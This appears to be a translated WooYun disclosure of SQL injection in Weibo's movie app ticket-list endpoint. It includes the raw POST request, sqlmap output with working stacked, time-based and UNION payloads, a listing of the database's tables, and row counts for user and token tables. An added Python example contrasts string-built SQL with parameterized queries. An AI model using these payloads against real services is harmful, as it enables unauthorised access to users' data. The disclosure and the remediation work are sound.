WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --------------------------- http://drop.zone.ci/
2016-03-23: Details sent to the vendor; awaiting vendor handling
2016-03-23: Vendor confirmed; details disclosed to the vendor only
2016-04-02: Details disclosed to core white hats and relevant domain experts
2016-04-12: Details disclosed to regular white hats
2016-04-22: Details disclosed to intern white hats
2016-05-07: Details disclosed to the public
I swear I had just gotten up from my nap and was scrolling Weibo to look at piapia酱, if you don't believe me look 44444444444444444444444444444444444444444444
Injection point:
POST /movieapp/mesdk/myticketlist HTTP/1.1
Host: movie.weibo.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

type=0&uid=inject here
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: type=0&uid=2806387901;(SELECT * FROM (SELECT(SLEEP(5)))FOPZ)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: type=0&uid=2806387901 AND (SELECT * FROM (SELECT(SLEEP(5)))CrcV)

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: type=0&uid=2806387901 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x41735366556276724f486866714c644f4f44626b5375476c73795464667a4f4152567a4b4a546474,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
database management system users [1]:
[*] 'musiclib_r'@'10.73.%'

available databases [3]:
[*] information_schema
[*] musiclib
[*] test
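The three sqlmap findings above all come from one defect: the `uid` value from the POST body is pasted into SQL text. The following is an added example, not code from the report or from Weibo's application; it models the ticket-list lookup against an in-memory SQLite database (an assumption standing in for the real MySQL backend, with an assumed `movie_ticket` table and columns) and places the string-concatenated lookup beside a hardened version that validates `uid` as a decimal integer and binds it as a query parameter.

```python
"""Added example: string-built SQL versus a bound parameter for the `uid` field.

Assumptions (not from the report): an in-memory SQLite stand-in for MySQL,
a `movie_ticket(uid, film)` table and a two-row `movie_app_user` table with
constructed sample data.
"""
import sqlite3


def make_db():
    """Build the constructed sample schema and data (assumed, not Weibo's)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE movie_app_user (uid INTEGER, name TEXT);
        CREATE TABLE movie_ticket (uid INTEGER, film TEXT);
        INSERT INTO movie_app_user VALUES (1001, 'alice'), (1002, 'bob');
        INSERT INTO movie_ticket VALUES
            (1001, 'Film A'), (1002, 'Film B'), (1002, 'Film C');
        """
    )
    return conn


def my_ticket_list_vulnerable(conn, uid):
    """The defect: the raw request value becomes part of the SQL text.

    Any text in `uid` is parsed as SQL, which is what lets a UNION or a
    time-based expression run with the application's database privileges.
    """
    sql = "SELECT film FROM movie_ticket WHERE uid = %s" % uid
    return [row[0] for row in conn.execute(sql)]


def validate_uid(uid):
    """Accept only a short string of decimal digits and return it as int."""
    if not isinstance(uid, str) or not uid.isdigit() or len(uid) > 20:
        raise ValueError("uid must be a decimal integer")
    return int(uid)


def my_ticket_list_param_only(conn, uid):
    """Binding alone: the value can never be parsed as SQL, only compared."""
    rows = conn.execute("SELECT film FROM movie_ticket WHERE uid = ?", (uid,))
    return [row[0] for row in rows]


def my_ticket_list_safe(conn, uid):
    """Hardened form: validate the type, then bind the value as a parameter."""
    uid_int = validate_uid(uid)
    return my_ticket_list_param_only(conn, uid_int)


if __name__ == "__main__":
    db = make_db()
    print(my_ticket_list_vulnerable(db, "1002"))            # legitimate use
    print(my_ticket_list_vulnerable(db, "1001 OR 1=1"))     # every user's rows
    print(my_ticket_list_vulnerable(
        db, "1001 UNION SELECT name FROM movie_app_user"))  # rows from another table
    print(my_ticket_list_param_only(db, "1001 OR 1=1"))     # [] : compared, not parsed
    print(my_ticket_list_safe(db, "1002"))                  # ['Film B', 'Film C']
```

With the bound parameter the whole string is compared against the `uid` column as a value and matches nothing; the type check in front of it additionally rejects the request at the edge so the malformed value never reaches the database and can be logged as a probe.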
I originally meant to submit it just like that, but then my hand slipped a little: 202 tables
Database: musiclib
[202 tables]
artist_match_name
cinema_area
cinema_baseinfo
cinema_screenings
cinema_tag
cinema_tag_mapcheck
firehose_info
mingxing_activity
mingxing_userflower
movie_admin_page
movie_answers
movie_app_push_task
movie_app_realtime_push
movie_app_user
movie_app_user_token
movie_article
movie_artist
movie_box_office
movie_box_office_poll
movie_convert_callback
movie_coupon
movie_coupon_backup
movie_customize
movie_dialogue
movie_dialogue_pic
movie_dictionary
movie_emotion
movie_event_schedule
movie_film
movie_film_old
movie_film_promote
movie_filmtopic
movie_focus
movie_foreign_comment
movie_friendfeed
movie_game_rank
movie_game_seek_reply
movie_game_tools
movie_gewala_buy
movie_group_comment_report
movie_group_user
movie_hashdata
movie_hottopic
movie_nativebanner
movie_newsinfo
movie_object_relation
movie_pagepoll
movie_photo
movie_place_sale
movie_poll_daily_detail
movie_poll_detail
movie_poll_detail_hot
movie_poll_manul
movie_proterty
movie_question_type
movie_questions
movie_relation
movie_relation_page
movie_ticket
movie_user_still
movie_video
movieapp_photo
open_api_info
open_api_tree
open_group
open_group_api_map
open_user
raw_album
raw_cinema_mapcheck
raw_map_check
raw_movie
raw_movie_artist_map
raw_movie_douban_pic
raw_movie_map
raw_mv
raw_mv_recommend
raw_podcast
raw_podcast_column
raw_podcast_map
raw_podcast_program
raw_singer
raw_song
raw_song_0
raw_song_1
raw_song_10
raw_song_11
raw_song_12
raw_song_13
raw_song_14
raw_song_15
raw_song_16
raw_song_17
raw_song_18
raw_song_19
raw_song_2
raw_song_20
raw_song_21
raw_song_22
raw_song_23
raw_song_3
raw_song_4
raw_song_5
raw_song_6
raw_song_7
raw_song_8
raw_song_9
raw_song_match
raw_source
res_ad
res_album
res_album_song_map
res_artist
res_artist_album_map
res_artist_song_map
res_asiapoll_blacklist
res_band
res_card_info
res_celebrity_songlist
res_chinasong_manul
res_comm_item
res_common_banner
res_copyright
res_copyright_album_map
res_copyright_artist_map
res_copyright_song_map
res_country
res_coupon_a
res_famous_songlist
res_feedback
res_film_bonus
res_film_coupon
res_focus
res_friendfeed
res_hashdata
res_hotweibo
res_hotweibo_new
res_interface_test
res_keyword_queue
res_language
res_language_album_map
res_language_artist_map
res_language_song_map
res_log
res_lyric
res_merge_log
res_music_style
res_musician_group
res_musician_page
res_musicstyle_album_map
res_musicstyle_artist_map
res_musicstyle_song_map
res_musictopic
res_nativebanner
res_object_creator_mblog
res_page_layout
res_page_render_map
res_page_rule_set
res_pagepoll
res_party_song
res_party_user_action
res_party_user_video
res_relation_store
res_reservation
res_right_card_map
res_right_card_model
res_s3_log
res_search_watch
res_share_text_map
res_song
res_song_audio
res_song_countinfo
res_song_ext
res_song_outter_00
res_song_outter_01
res_song_outter_02
res_song_outter_03
res_song_outter_04
res_song_outter_05
res_song_outter_06
res_song_outter_07
res_song_outter_08
res_song_outter_09
res_song_outter_0a
res_song_outter_0b
res_song_outter_0c
res_song_outter_0d
res_song_outter_0e
res_song_outter_0f
res_song_ringtone
res_songautopush_event
res_square_point_uid
res_timing_job
res_topic_monitor
res_uidlist
res_update_film
res_update_song
res_user
res_user_rate
res_usergroup
song_match_name
song_mv_map
xunlongjue_message
Of these, movie_app_user and movie_app_user_token hold 380 thousand and 130 thousand rows respectively
Database: musiclib
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| movie_app_user | 385824  |
+----------------+---------+

Database: musiclib
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| movie_app_user_token | 139005  |
+----------------------+---------+
Scared poor baby me to death
I pulled 20 rows of data as proof
Throughout, I pulled only 20 rows to demonstrate the impact; I did not dump the database
Advice welcome (I wouldn't mind if you want to send me a gift)
Severity: High
Vulnerability Rank: 10
Confirmed at: 2016-03-23 17:39
Thank you for your attention to Sina Security; the issue is being fixed.
None yet